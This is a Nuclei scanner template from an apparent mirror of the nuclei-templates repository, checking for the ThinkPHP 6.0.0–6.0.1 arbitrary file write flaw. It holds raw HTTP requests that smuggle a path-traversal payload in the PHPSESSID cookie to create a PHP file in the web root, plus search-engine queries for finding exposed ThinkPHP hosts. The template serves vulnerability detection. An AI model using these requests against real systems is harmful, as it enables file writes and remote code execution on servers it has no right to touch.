admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-01 00:03:39 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
c31d574176f2b9e6f8d4fe573a24e7192f808e84
nuclei-templates/http/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml
ghost c31d574176 chore: update TemplateMan 🤖
2025-05-27 02:29:19 +00:00

55 lines
2.0 KiB
YAML
Raw Blame History

id: thinkphp6-arbitrary-write
info:
name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write
author: arliya
severity: critical
description: |
ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string
reference: |
- https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591
- https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
- https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml
classification:
cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: thinkphp
product: thinkphp
shodan-query:
- http.title:"thinkphp"
- cpe:"cpe:2.3:a:thinkphp:thinkphp"
zoomeye-query: app="thinkphp"
fofa-query:
- app="thinkphp"
- app="thinkphp" && title="system error"
- header="think_lang"
- title="thinkphp"
google-query: intitle:"thinkphp"
tags: thinkphp,file-upload,rce
variables:
random_filename: "{{to_lower(rand_base(11))}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=/../../../public/{{random_filename}}.php
Content-Type: application/x-www-form-urlencoded
- |
GET /{{random_filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header_1
words:
- "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php"
- type: dsl
dsl:
- "status_2 == 200"
# digest: 490a0046304402204e35cced77df1c56436f7eac6298e1475ca51a566bf2d750ac22091d1fe8410102207cf551ee74b3863d383224505a5aa3d81c93a3b166f463a57df734f8400ac58b:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink